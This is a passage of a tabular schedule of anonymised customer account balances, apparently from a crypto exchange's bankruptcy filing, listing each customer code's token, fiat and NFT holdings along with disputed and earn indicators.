| 07361212 | | BAT[1], CUSDT[3], DOGE[14699.32723029], GRT[1], SHIB[10053377.04073118], TRX[4], USD[0.00] | | |
| 07361213 | | DOGE[135.36344204], USD[0.00] | | |
| 07361214 | | USD[10.00] | | |
| 07361215 | | CUSDT[3], USD[0.00], USDT[0] | | |
| 07361216 | | DOGE[7759.4018], USD[248.97] | | |
| 07361217 | | DOGE[1], GRT[4.59137854], SUSHI[3.54630707], USD[0.00] | Yes | |
| 07361218 | | DOGE[3], ETH[.22843973], ETHW[.22843973], SUSHI[.00001406], TRX[2], USD[72.28] | | |
| 07361220 | | CUSDT[4], DOGE[276.91345273], ETH[.00001905], ETHW[.00001905], LTC[0], USD[0.43] | | |
| 07361221 | | BRZ[0], USD[0.00] | | |
| 07361222 | | BRZ[1], CUSDT[15], SHIB[12.54049542], USD[0.00], USDT[0] | Yes | |
| 07361223 | | USD[10.00] | | |
| 07361224 | | BAT[1], BRZ[2], CUSDT[1], TRX[1], USD[0.01] | | |
| 07361227 | | BAT[1], DOGE[526.75112771], USD[0.01] | | |
| 07361228 | | USD[10.00] | | |
| 07361230 | | BRZ[1], DOGE[14413.09616889], USD[0.00], USDT[1] | | |
| 07361231 | | BAT[1], DOGE[1], GRT[1], SHIB[2], TRX[4], USD[6.17], USDT[0.00000001] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07361232 | | BRZ[1], CUSDT[2], TRX[1], USD[0.00] | | |
| 07361233 | | USD[20.00] | | |
| 07361234 | | USD[10.00] | | |
| 07361235 | | USD[10.00] | | |
| 07361236 | | SHIB[7120.97396801], USD[0.00] | | |
| 07361237 | | BAT[1], BRZ[3], BTC[.00000046], CUSDT[10], DOGE[.3493805], GRT[1.08606033], TRX[2.89729197], USD[2190.59] | | |
| 07361238 | | USD[10.00] | | |
| 07361239 | | BRZ[1], DOGE[1.00812789], TRX[3248.8071549], USD[0.00] | | |
| 07361240 | | USD[10.00] | | |
| 07361241 | | BRZ[5.54907174], BTC[.00003944], DAI[2.19731323], DOGE[5.74469385], USD[0.01], YFI[.00002674] | Yes | |
| 07361242 | | CUSDT[2], DOGE[2421.98570506], TRX[2], USD[50.00] | | |
| 07361243 | | DOGE[0.12745051], ETH[.00000001], ETHW[0], USD[0.36], USDT[0] | | |
| 07361244 | | USD[10.00] | | |
| 07361245 | | USD[10.00] | | |
| 07361246 | | CUSDT[1], DOGE[7698.12624707], USD[0.00] | | |
| 07361247 | | CUSDT[1], DOGE[.00006766], TRX[2], USD[0.24] | | |
| 07361249 | | BRZ[1], DOGE[859.34560229], USD[0.00] | | |
| 07361250 | | USD[10.00] | | |
| 07361251 | | USD[10.00] | | |
| 07361252 | | USD[11.07] | Yes | |
| 07361253 | | USD[0.01] | | |
| 07361254 | | BTC[0], TRX[4.69975847], USD[0.00] | | |
| 07361255 | | BTC[0], ETH[0], ETHW[0], GRT[.00000001], NFT (326896274382149802/David #911)[1], NFT (396935331491047190/David #846)[1], NFT (435857220357646417/David #844)[1], SOL[0], USD[0.00], USDT[0] | Yes | |
| 07361256 | | USD[2.34] | | |
| 07361257 | | BAT[121.07670047], BCH[.06304235], BRZ[4], BTC[.02496954], CUSDT[183.00386824], ETH[0.05727073], ETHW[0.05655937], GRT[62.67899947], LINK[5.763684], MATIC[123.41573923], NFT (306995832560026956/Surreal World #55)[1], NFT (346500682397371579/Australia Ticket Stub #1066)[1], NFT (349225495363438863/Magic Mushroom  #8)[1], SOL[6.20257534], SUSHI[3.51853212], TRX[2], USD[26.02], USDT[0.00091636], YFI[.00052654] | Yes | |
| 07361259 | | CUSDT[459.78061723], DOGE[6.87233063], USD[4.83] | | |
| 07361260 | | USD[10.00] | | |
| 07361261 | | USD[0.00] | | |
| 07361262 | | USD[10.00] | | |
| 07361263 | | CUSDT[2], DOGE[1], ETH[.00456408], ETHW[.00456408], TRX[2], USD[0.00] | | |
| 07361264 | | USD[10.99] | Yes | |
| 07361268 | | USD[710.00] | | |
| 07361269 | | USD[10.00] | | |
| 07361270 | | BRZ[2], CUSDT[3], DOGE[13306.57409713], ETH[.0007221], ETHW[.0007221], TRX[9148.4628293], USD[1159.88] | | |
| 07361271 | | BAT[0], BRZ[3], BTC[0.00000022], CUSDT[13], DOGE[0], ETH[0], ETHW[0], GRT[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[0.27], USDT[0.00000394] | Yes | |
| 07361272 | | DOGE[1], ETH[0], ETHW[0], USD[0.00] | | |
| 07361273 | | USD[10.00] | | |
| 07361275 | | USD[10.00] | | |
| 07361276 | | USD[10.00] | | |
| 07361277 | | USD[10.31] | Yes | |
| 07361278 | | CUSDT[3], TRX[2], USD[0.00], YFI[.00438614] | | |
| 07361279 | | USD[10.00] | | |
| 07361280 | | USD[10.00], USDT[1] | | |
| 07361281 | | USD[10.00] | | |
| 07361282 | | USD[10.00] | | |
| 07361283 | | CUSDT[3], DOGE[2], ETH[.00000056], ETHW[.06091687], TRX[1], USD[0.00] | Yes | |
| 07361284 | | USD[10.00] | | |
| 07361285 | | USD[0.19], USDT[0] | Yes | |
| 07361286 | | DOGE[6], LTC[0], SOL[0], SUSHI[0], USD[0.00] | | |
| 07361287 | | USD[10.00] | | |
| 07361288 | | LINK[.38435836], USD[0.00] | | |
| 07361289 | | CUSDT[2], DOGE[132.66564626], TRX[1], USD[0.00] | | |
| 07361290 | | USD[0.00] | Yes | |
| 07361291 | | DOGE[123.53062634], SHIB[24882.78070898], USD[0.00] | Yes | |
| 07361292 | | USD[0.00] | | |
| 07361293 | | CUSDT[2], LINK[0], SOL[0], TRX[0], UNI[0.54847572], USD[0.00], USDT[0.00000001] | | |
| 07361294 | | CUSDT[2], DOGE[.00075556], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07361295 | | USD[10.00] | | |
| 07361296 | | BF_POINT[100], USD[0.00] | Yes | |
| 07361297 | | USD[10.00] | | |
| 07361298 | | DOGE[564.03904371], USD[0.00] | | |
| 07361299 | | USD[10.00] | | |
| 07361300 | | USD[10.00] | | |
| 07361301 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07361302 | | USD[10.38] | Yes | |
| 07361303 | | BRZ[0], DOGE[.00225389], ETH[.00134795], ETHW[.00134795], TRX[.01485381], USD[0.00] | | |
| 07361304 | | USD[0.00] | Yes | |
| 07361305 | | USD[10.00] | | |
| 07361306 | | GRT[4.33026107], USD[0.00] | | |
| 07361307 | | SOL[1.07845967], USD[0.00] | | |
| 07361308 | | DOGE[175.42791693], USD[0.00] | | |
| 07361309 | | CUSDT[3], DOGE[0], USD[0.00] | | |
| 07361310 | | USD[10.00] | | |
| 07361311 | | DOGE[88.37311395], USD[0.00] | | |
| 07361312 | | USD[10.00] | | |
| 07361314 | | GRT[.00011932], USD[0.03] | Yes | |
| 07361315 | | CUSDT[3], DOGE[5017.98842959], GRT[1], SOL[0], USD[0.01] | | |
| 07361316 | | SOL[0], USDT[0.00000013] | | |
| 07361317 | | USD[588.99] | | |
| 07361318 | | BRZ[1], DOGE[.91194259], USD[0.01] | | |
| 07361319 | | USD[10.00] | | |
| 07361320 | | USD[10.00] | | |
| 07361321 | | BTC[0.00001810], USDT[1.0009584] | | |
| 07361323 | | USD[10.00] | | |
| 07361324 | | CUSDT[1], DOGE[141.4733897], TRX[2], USD[0.00] | | |
| 07361325 | | USD[10.00] | | |
| 07361326 | | USD[10.00] | | |
| 07361327 | | USD[10.00] | | |
| 07361329 | | USD[11.11] | Yes | |
| 07361330 | | USD[10.00] | | |
| 07361332 | | BAT[122.56419067], BRZ[117.45627899], CUSDT[277.82189005], DOGE[21710.80862402], NFT (290161460580354812/Tranoxath #1)[1], NFT (295177528661945194/Animal Gang #143)[1], NFT (309839704845275285/Lorenz #882)[1], NFT (391849682361027102/2D SOLDIER #467)[1], NFT (404357228174864669/#3088)[1], NFT (438259618728075359/Aggolian #3)[1], NFT (449635852397769815/Ape MAN#57)[1], NFT (465924133877985520/#2960)[1], NFT (474590111365418373/2D SOLDIER #1109)[1], NFT (497330129769548198/Animal Gang #188)[1], NFT (529285371497596494/Jorgexos #4)[1], SOL[9.35118662], TRX[563.64971917], USD[0.71] | Yes | |
| 07361333 | | USD[10.00] | | |
| 07361334 | | USD[10.00] | | |
| 07361335 | | DOGE[1], ETH[.00575965], ETHW[.00575965], USD[0.00] | | |
| 07361336 | | USD[0.00] | | |
| 07361337 | | DOGE[134.71139498], USD[0.00] | | |
| 07361338 | | BAT[1], CUSDT[2], TRX[1], USD[0.00] | | |
| 07361339 | | USD[10.00] | | |
| 07361341 | | BRZ[1], CUSDT[3], GRT[1], TRX[3], USD[0.02] | | |
| 07361342 | | BRZ[1], CUSDT[5], DOGE[1], SOL[.23727461], USD[0.00] | Yes | |
| 07361343 | | DOGE[145.39751438], USD[1.00] | | |
| 07361344 | | DOGE[1], TRX[182.65951152], USD[0.34] | | |
| 07361345 | | BAT[1], BRZ[1], BTC[.01830389], CUSDT[1], DOGE[1], GRT[1], USD[0.00], USDT[2] | | |
| 07361346 | | USD[10.00] | | |
| 07361347 | | USD[10.00] | | |
| 07361348 | | SOL[.6255597], USD[0.00] | | |
| 07361349 | | USD[10.00] | | |
| 07361350 | | USD[10.00] | | |
| 07361351 | | CUSDT[1], USD[10.00] | | |
| 07361352 | | USD[10.00] | | |
| 07361353 | | BTC[0], DOGE[0.46087019], ETH[0], USD[0.00] | | |
| 07361355 | | USD[10.00] | | |
| 07361356 | | USD[10.00] | | |
| 07361357 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07361358 | | CUSDT[9], DOGE[1], ETH[.00000001], TRX[4], USD[0.00], USDT[0] | Yes | |
| 07361361 | | ETH[0], GRT[0], LINK[0], SOL[0], SUSHI[0], UNI[0], USD[0.00], USDT[0.00000056] | | |
| 07361362 | | DOGE[0], SOL[0.00000001], TRX[0], USD[0.00], USDT[0] | | |
| 07361363 | | USD[10.00] | | |
| 07361364 | | USD[0.07], USDT[0] | | |
| 07361365 | | DOGE[1], GRT[35.37283456], LINK[8.92222516], TRX[2], USD[0.00] | | |
| 07361367 | | BRZ[2], BTC[.02355704], CUSDT[43.35655751], DOGE[2], ETH[1.16355769], ETHW[1.16306906], GRT[2.08051888], KSHIB[217.20570364], LINK[28.0588353], MATIC[52.26256445], SHIB[2], SOL[.12568611], SUSHI[1.11027907], TRX[401.19688291], USD[0.00], USDT[2.19329234] | Yes | |
| 07361368 | | USD[10.00] | | |
| 07361369 | | USD[10.00] | | |
| 07361370 | | BTC[0], DOGE[.00292834], USD[0.00] | | |
| 07361371 | | CUSDT[2], DOGE[3786.01615709], TRX[2], USD[0.00] | Yes | |
| 07361372 | | USD[10.00] | | |
| 07361373 | | BRZ[2], BTC[0], CUSDT[24], GRT[1], TRX[2], USD[1.32] | | |
| 07361374 | | USD[10.66] | Yes | |
| 07361375 | | USD[10.00] | | |
| 07361376 | | USD[10.00] | | |
| 07361378 | | TRX[1], USD[0.00] | Yes | |
| 07361379 | | DOGE[2973.30613207], USD[10.00] | | |
| 07361380 | | USD[10.00] | | |
| 07361381 | | ETH[0], SUSHI[0], USD[0.00] | | |
| 07361382 | Contingent, Disputed | CUSDT[3.48530737], DOGE[0.07875364], SHIB[118801.29661282], TRX[1], USD[0.05], USDT[0] | Yes | |
| 07361383 | | DOGE[1.00000936], USD[0.00] | | |
| 07361384 | | USD[11.06] | Yes | |
| 07361386 | | USD[10.00] | | |
| 07361387 | | USD[10.00] | | |
| 07361388 | | BAT[1], CUSDT[1], DOGE[1.00004142], ETH[.60433097], ETHW[.60433097], GRT[1], LTC[16.15726334], UNI[12.9710378], USD[0.79] | | |
| 07361389 | | USD[0.00] | | |
| 07361391 | | BF_POINT[100], DOGE[1636.8691266], NFT (552833319377265951/Entrance Voucher #7541)[1], SHIB[11341676.02143896], USD[0.00] | Yes | |
| 07361392 | | CUSDT[3], USD[0.00] | | |
| 07361393 | | USD[10.00] | | |
| 07361395 | | USD[10.00] | | |
| 07361396 | | USD[0.21] | | |
| 07361397 | | DOGE[16008.9506122], GRT[633.9010112], KSHIB[40380.56054366], SHIB[7039068.27459333], SOL[52.6700097], SUSHI[45.84491936], USD[0.00], USDT[0] | Yes | |
| 07361398 | | CUSDT[1], USD[0.01] | | |
| 07361400 | | BAT[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07361401 | | USD[10.00] | | |
| 07361402 | | USD[0.00] | | |
| 07361403 | | BTC[.00171533], CUSDT[477.37824165], DOGE[579.72112394], SOL[.35640504], TRX[162.248502], USD[0.00] | | |
| 07361405 | | USD[20.00] | | |
| 07361407 | | DOGE[28.52248317], USD[0.00] | | |
| 07361408 | | USD[10.00] | | |
| 07361409 | | ETH[.00607937], ETHW[.0060015], USD[0.00] | Yes | |
| 07361410 | | CUSDT[1], USD[0.00], USDT[0] | Yes | |
| 07361411 | | CUSDT[1], DOGE[1044.36570691], USD[0.01], USDT[0.00000001] | Yes | |
| 07361412 | | USD[10.00] | | |
| 07361413 | | BRZ[1], CUSDT[5], DOGE[1], USD[0.00] | | |
| 07361414 | | BTC[.00021035], USD[0.00] | | |
| 07361415 | | USD[10.00] | | |
| 07361416 | | USD[10.00] | | |
| 07361417 | | BRZ[1], CUSDT[3], DOGE[.10278586], GRT[.00003294], TRX[.00000017], USD[1105.82], USDT[0.00039939] | | |
| 07361418 | | BTC[.00017907], USD[0.00] | | |
| 07361419 | | DOGE[161.38828064], SHIB[173135.4238057], USD[0.00] | Yes | |
| 07361420 | | CUSDT[2], USD[0.00] | | |
| 07361421 | | USD[20.00] | | |
| 07361422 | | USD[0.00] | | |
| 07361423 | | USD[10.00] | | |
| 07361424 | | NFT (380907098908333548/FTX - Off The Grid Miami #5935)[1], NFT (386429784870572643/Imola Ticket Stub #2383)[1] | Yes | |
| 07361425 | | CUSDT[2], DOGE[0], ETH[0], USD[0.00], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07361426 | | USD[0.00] | | |
| 07361427 | | CUSDT[2], DOGE[1565.24197816], USD[0.00] | Yes | |
| 07361428 | | CUSDT[1], DOGE[97.64785985], TRX[71.00849413], USD[0.00] | | |
| 07361430 | | BCH[.00716669], CUSDT[9], DAI[9.90447931], DOGE[1019.30195101], LTC[.02300982], SHIB[3], TRX[3], USD[0.00] | | |
| 07361432 | | USD[10.00] | | |
| 07361433 | | BRZ[0.00000001], GRT[0], USD[0.00] | | |
| 07361435 | | BAT[195.69880052], BRZ[2], BTC[.02209323], CUSDT[9], DOGE[29077.01803594], ETH[1.99286549], ETHW[1.99286549], GRT[1], LTC[8.49551914], MATIC[210.34094784], SOL[7.52620033], TRX[8096.13333137], USD[0.00], USDT[0] | | |
| 07361437 | | USD[10.00] | | |
| 07361438 | | BAT[.00080287], BRZ[1], CUSDT[9], DOGE[195.99695702], ETH[.00000031], ETHW[.00000031], SHIB[2600647.75187013], TRX[3], USD[0.01] | Yes | |
| 07361439 | | BTC[0], DOGE[.00018273], ETH[0], ETHW[0.01693002], LINK[.00027184], LTC[0], MATIC[.00000001], SHIB[12], SOL[0], SUSHI[0], TRX[1], UNI[.00000001], USD[0.00], USDT[0.00000728] | Yes | |
| 07361440 | | CUSDT[2], DOGE[76.17863663], TRX[2], USD[93.09] | | |
| 07361441 | | USD[10.86] | Yes | |
| 07361442 | | DOGE[0], ETH[0], USD[1.36] | | |
| 07361443 | | DOGE[1], NFT (464914394883485440/Australia Ticket Stub #154)[1], USD[0.00] | Yes | |
| 07361444 | | CUSDT[1], DOGE[.00338061], MATIC[0], NFT (366304060667819170/NFT BZL 2021 #132)[1], NFT (503895171654682548/FTX - Off The Grid Miami #882)[1], SHIB[32.70803331], TRX[3], USD[0.00] | Yes | |
| 07361445 | | USD[1.11] | | |
| 07361446 | Contingent, Disputed | USD[0.00] | | |
| 07361447 | | ETH[.00082], ETHW[.00082], SOL[.00263236], SUSHI[291.03375826], USD[5250.66] | | |
| 07361448 | | AAVE[.00710408], AVAX[.0097296], BAT[5.23258759], BCH[.04770077], BRZ[64.89420976], CUSDT[453.72304815], DAI[1.09148866], DOGE[.06840854], ETHW[.02852034], GRT[10.39191109], KSHIB[394.30579169], LINK[.25392507], LTC[1.17993863], MKR[.0007361], NFT (290015017584313941/APEFUEL by Almond Breeze #258)[1], NFT (348170317859665096/Saudi Arabia Ticket Stub #1470)[1], NFT (363963694317708953/Silverstone Ticket Stub #194)[1], PAXG[.00114824], SHIB[986185.64065657], SOL[1.81916773], SUSHI[2.50828678], TRX[176.02428569], UNI[.35387206], USD[0.25], USDT[0.00004231], YFI[.00004214] | Yes | |
| 07361449 | | CUSDT[4], DOGE[639.49046234], USD[0.00], USDT[0.00002342] | Yes | |
| 07361450 | | USD[10.00] | | |
| 07361451 | | BAT[27.39666563], BRZ[2], CUSDT[11], DOGE[13.41476031], ETH[.00070543], ETHW[.05995303], SOL[11.94248978], TRX[5], USD[2.71], USDT[1.06242795] | Yes | |
| 07361452 | | CUSDT[1], ETH[0.00000005], ETHW[0.00000005], SHIB[413748.23190852], USD[0.00] | Yes | |
| 07361453 | | BAT[0], BRZ[0.00000001], BTC[0.00000210], CUSDT[2], DOGE[2], ETH[0], EUR[0.00], GRT[0], LTC[0], SOL[0], SUSHI[0], TRX[3], UNI[0], USD[0.00], USDT[1.10792142] | Yes | |
| 07361455 | | USD[10.00] | | |
| 07361456 | | DOGE[.288], USD[7.48], USDT[0] | | |
| 07361457 | | USD[10.00] | | |
| 07361458 | | USD[0.00] | | |
| 07361459 | | USD[0.00], USDT[0] | | |
| 07361460 | | USD[10.00] | | |
| 07361461 | | BRZ[2], CUSDT[5], SOL[12.50725537], USD[0.00] | | |
| 07361463 | | USD[10.00] | | |
| 07361464 | | USD[0.00] | Yes | |
| 07361465 | | DOGE[39.94970465], USD[0.00] | Yes | |
| 07361466 | | CUSDT[1], DOGE[1], USD[0.00] | Yes | |
| 07361467 | | USD[10.00] | | |
| 07361468 | | USD[10.00] | | |
| 07361469 | | USD[10.00] | | |
| 07361470 | | BTC[0], CUSDT[2], DOGE[140.71795792], TRX[1.76756691], USD[0.00] | Yes | |
| 07361471 | | USD[0.01] | | |
| 07361472 | | DAI[0], DOGE[.00010979], ETH[0], ETHW[0], MATIC[0], SHIB[43], SOL[0], USD[0.00], USDT[0.00000030] | Yes | |
| 07361473 | | USD[10.00] | | |
| 07361474 | | CUSDT[1], TRX[2], USD[0.00], USDT[0] | | |
| 07361478 | | DOGE[20.3872925], USD[0.00] | | |
| 07361479 | | CUSDT[1], USD[0.00] | | |
| 07361481 | | BRZ[1], GRT[1], USD[0.00], USDT[1] | | |
| 07361482 | | BCH[.01840013], USD[0.00] | | |
| 07361483 | | USD[0.00] | | |
| 07361484 | | CUSDT[3], DAI[9.94407343], DOGE[103.67402039], SHIB[301613.6329362], USD[0.00] | | |
| 07361485 | | USD[10.00] | | |
| 07361486 | | GRT[4.46788028], USD[0.00] | | |
| 07361489 | | USD[10.00] | | |
| 07361490 | | USD[10.00] | | |
| 07361491 | | USD[0.00] | | |
| 07361492 | | USD[0.00] | | |
| 07361493 | | NEAR[.095], SOL[.00644], USD[0.00], USDT[.007608] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07361494 | | BRZ[2], BTC[.04691863], CUSDT[526.55200939], DOGE[614.70701349], TRX[1], USD[0.00] | Yes | |
| 07361495 | | BF_POINT[300], GRT[0], USD[0.00] | | |
| 07361496 | | BRZ[0], BTC[0], DOGE[0], ETH[0], EUR[0.00], PAXG[0], SOL[0], SUSHI[0], USD[0.00] | | |
| 07361497 | | AVAX[.41129427], BAT[3.19021896], BRZ[3], CUSDT[21], DOGE[43.73534125], ETH[.00424986], ETHW[0.15670043], GRT[1], LINK[3.74058907], LTC[0.00001925], MATIC[.00267793], NFT (414385509074524094/The Hill by FTX #1806)[1], NFT (495441926492906522/My Day #4/4 )[1], SHIB[4], TRX[8], USD[400.00], USDT[2.19914997] | Yes | |
| 07361499 | | USD[10.00] | | |
| 07361500 | | USD[10.00] | | |
| 07361501 | | USD[11.08] | Yes | |
| 07361502 | | SOL[362.65126395], USD[0.00], USDT[1.07259694] | Yes | |
| 07361504 | | USD[10.00] | | |
| 07361505 | | GRT[4.31740693], USD[0.00] | | |
| 07361506 | | USD[10.00] | | |
| 07361507 | | USD[10.00] | | |
| 07361509 | | BAT[209.50711291], BCH[.26851448], BTC[.00107209], CUSDT[10], DOGE[2316.12929878], ETH[.04435966], ETHW[.04381177], KSHIB[1360.46799525], SHIB[997748.94504255], TRX[2], USD[0.00] | Yes | |
| 07361510 | | USD[10.00] | | |
| 07361512 | | BTC[.0002229], CUSDT[2], DOGE[4793.05505371], TRX[1], USD[0.00] | | |
| 07361513 | | CUSDT[4], DOGE[3643.24956239], TRX[1], USD[0.00] | | |
| 07361514 | | USD[10.06] | | |
| 07361515 | | USD[10.00] | | |
| 07361516 | | USD[10.00] | | |
| 07361518 | | USD[10.00] | | |
| 07361519 | | BAT[2.03796143], CUSDT[1], DOGE[0], GRT[1], TRX[5826.11804098], USD[1532.94], USDT[1.06120352] | Yes | |
| 07361521 | | USD[10.00] | | |
| 07361522 | | BRZ[1], CUSDT[8], DOGE[.76658689], ETH[.00476342], ETHW[.0047087], SHIB[1], TRX[2], USD[0.01] | Yes | |
| 07361523 | | USD[10.00] | | |
| 07361524 | | ALGO[329.72864026], AVAX[7.13328396], BRZ[3], CAD[102.97], CUSDT[50.02083173], DOGE[16.13149269], EUR[26.04], GRT[3655.60872374], LINK[35.61121826], MATIC[410.1609088], NEAR[44.62044633], NFT (361314623201463754/FTX EU - we are here! #213860)[1], NFT (388884889221666533/FTX EU - we are here! #45232)[1], NFT (490540231898158563/FTX EU - we are here! #45016)[1], SHIB[84], SOL[14.93949982], SUSHI[402.75649209], TRX[18.76517005], UNI[88.12905267], USD[152.32] | Yes | |
| 07361525 | | EUR[4.09], GRT[1.35590007], USD[51.30] | | |
| 07361526 | | TRX[1], USD[0.01], USDT[0] | | |
| 07361527 | | BAT[0], CUSDT[1], USD[0.01] | | |
| 07361528 | | USD[10.00] | | |
| 07361529 | | USD[10.00] | | |
| 07361530 | | TRX[216.89889315], USD[0.00] | Yes | |
| 07361531 | | BAT[1.00224908], BRZ[6.61910333], CUSDT[25], DOGE[2.01874376], GRT[3.17287901], MATIC[0], SHIB[0], SOL[0], TRX[1.00035665], USD[238.86], USDT[0] | Yes | |
| 07361532 | | USD[10.00] | | |
| 07361533 | | USD[10.00] | | |
| 07361534 | | CUSDT[5], DOGE[72.94238185], USD[7.39] | | |
| 07361535 | | SUSHI[.68170781], USD[0.00] | | |
| 07361536 | | USD[10.00] | | |
| 07361537 | | USD[10.00] | | |
| 07361538 | | USD[10.00] | | |
| 07361540 | | USD[0.00], USDT[0] | | |
| 07361541 | | USD[10.00] | | |
| 07361542 | | USD[10.82] | Yes | |
| 07361543 | | CUSDT[2], DOGE[4], TRX[2197.96726605], USD[0.00] | Yes | |
| 07361544 | | BF_POINT[200], ETH[0], ETHW[0], SOL[.00039437], USD[165.00], USDT[0] | Yes | |
| 07361545 | | BRZ[3], BTC[.0015454], CUSDT[11], DOGE[552.35822862], ETH[.22145683], ETHW[.22123867], SOL[1.47302348], TRX[1], USD[0.00] | Yes | |
| 07361546 | | USD[0.00] | | |
| 07361547 | | USD[10.91] | Yes | |
| 07361548 | | USD[10.00] | | |
| 07361549 | | NFT (333500798137739177/Romeo #1005)[1] | | |
| 07361550 | | CUSDT[2], USD[0.00] | | |
| 07361551 | | AAVE[.0024909], AUD[3.08], BAT[.6136722], BCH[.00085129], BRZ[26.43053163], BTC[.00001069], CAD[3.01], CUSDT[427.85437303], DAI[4.60824695], DOGE[593.30938577], ETH[.00235028], ETHW[.00232292], EUR[1.77], GBP[1.88], GRT[1.00343138], KSHIB[7.15360761], LINK[.05381155], LTC[.00577618], MATIC[.99504964], MKR[.00037068], PAXG[.00210939], SGD[2.51], SHIB[14892.35463324], SOL[1.97285958], SUSHI[.10865372], TRX[1689.59825728], UNI[.07176224], USD[3.54], USDT[.18896328], YFI[.00002483] | Yes | |
| 07361552 | | BRZ[1], BTC[.00043893], CUSDT[7], DOGE[1814.26904787], ETH[.05179628], ETHW[.05179628], TRX[1], USD[0.00] | | |
| 07361553 | | USD[10.00] | | |
| 07361554 | | BTC[0.00439388], DOGE[1], USD[0.00] | | |
| 07361555 | | USD[10.00] | | |
| 07361556 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07361557 | | USD[10.00] | | |
| 07361558 | | USD[0.00] | | |
| 07361559 | | USD[10.00] | | |
| 07361561 | | USD[10.79] | Yes | |
| 07361562 | | CUSDT[3], TRX[20.5034477], USD[0.00] | | |
| 07361563 | | USD[0.00] | Yes | |
| 07361564 | | USD[10.00] | | |
| 07361565 | | USD[10.00] | | |
| 07361566 | | USD[10.00] | | |
| 07361567 | | CUSDT[1], USD[0.00] | | |
| 07361569 | | BAT[1], CUSDT[1], DAI[0], DOGE[9.03010023], ETH[0], USD[0.00] | | |
| 07361573 | | USD[10.00] | | |
| 07361574 | | USD[10.00] | | |
| 07361575 | | DOGE[2787.84034841], USD[10.00] | | |
| 07361576 | | USD[10.00] | | |
| 07361577 | | DOGE[169.92858751], USD[0.00] | | |
| 07361578 | | USD[10.00] | | |
| 07361579 | | DOGE[12.19509864], TRX[1], USD[0.01], USDT[0] | | |
| 07361580 | | USD[10.00] | | |
| 07361581 | | USD[10.00] | | |
| 07361582 | | USD[0.00] | | |
| 07361583 | | DOGE[1], USD[0.00] | | |
| 07361584 | | USD[10.00] | | |
| 07361585 | | USD[10.00] | | |
| 07361586 | | CUSDT[2], DOGE[89.70147893], KSHIB[3.83299262], LTC[.02020818], SHIB[32.67350264], SOL[.00234675], TRX[2], USD[0.42] | Yes | |
| 07361587 | | BRZ[1], CUSDT[2], TRX[1], USD[0.06] | Yes | |
| 07361588 | | USD[10.00] | | |
| 07361589 | | CUSDT[1], DOGE[3620.31804696], TRX[1], UNI[5.74769824], USD[0.00] | Yes | |
| 07361590 | | USD[10.00] | | |
| 07361591 | | USD[10.00] | | |
| 07361592 | | USD[10.00] | | |
| 07361593 | | USD[0.01] | | |
| 07361594 | | CUSDT[5], DOGE[2362.91408185], TRX[1], USD[0.84] | | |
| 07361595 | | USD[10.00] | | |
| 07361596 | | BRZ[1], CUSDT[2], DOGE[7002.10026795], SHIB[20744068.15517942], TRX[1473.32054796], USD[0.00] | Yes | |
| 07361597 | | BTC[0], DOGE[0], ETH[.00000001], LTC[0], NFT [413107650297843540/Romeo #990][1], NFT [431558096148356754/Entrance Voucher #3897][1], SOL[0], USD[0.05] | | |
| 07361598 | | USD[310.00] | | |
| 07361600 | | USD[10.00] | | |
| 07361601 | | USD[10.00] | | |
| 07361603 | | USD[10.00] | | |
| 07361604 | | USD[10.00] | | |
| 07361605 | | USD[10.00] | | |
| 07361606 | | USD[10.00] | | |
| 07361607 | | DOGE[1.80353098], USD[0.00] | | |
| 07361609 | | DOGE[142.49603754], USD[0.00] | | |
| 07361610 | | TRX[1], USD[0.01] | | |
| 07361611 | | USD[10.00] | | |
| 07361612 | | USD[10.00] | | |
| 07361613 | | USD[10.00] | | |
| 07361614 | | BRZ[1], ETH[0], SOL[22.87346160], USD[0.01], USDT[0] | | |
| 07361615 | | BRZ[1], NFT [538460371775413829/Barcelona Ticket Stub #879][1], SHIB[1], USD[0.00] | | |
| 07361616 | | USD[10.00] | | |
| 07361617 | | USD[10.00] | | |
| 07361618 | | USD[0.00], USDT[0] | Yes | |
| 07361619 | | USD[10.00] | | |
| 07361620 | | USD[10.00] | | |
| 07361621 | | USD[10.00] | | |
| 07361623 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07361624 | | CUSDT[2], DOGE[240.18375646], GRT[1.00367791], TRX[1], UNI[1.09396403], USD[0.01] | Yes | |
| 07361625 | | USD[10.00] | | |
| 07361626 | | BRZ[1], DOGE[9403.87978289], ETH[.19779868], ETHW[.19758725], USD[10.82] | Yes | |
| 07361627 | | USD[0.57] | | |
| 07361628 | | BRZ[1], BTC[.00161679], CUSDT[7], DOGE[8458.43292131], SHIB[1], TRX[1091.88040457], USD[0.00] | Yes | |
| 07361629 | | USD[10.00] | | |
| 07361631 | | DOGE[73.36662524], TRX[1], USD[0.31] | | |
| 07361632 | | USD[10.00] | | |
| 07361634 | | USD[10.00] | | |
| 07361635 | | USD[0.00], USDT[0] | | |
| 07361636 | | USD[10.00] | | |
| 07361639 | | USD[10.00] | | |
| 07361640 | | USD[10.00] | | |
| 07361641 | | CHF[980.10], DOGE[77102.09740016], USD[1242.12] | Yes | |
| 07361643 | | DOGE[2], TRX[1], USD[0.00] | | |
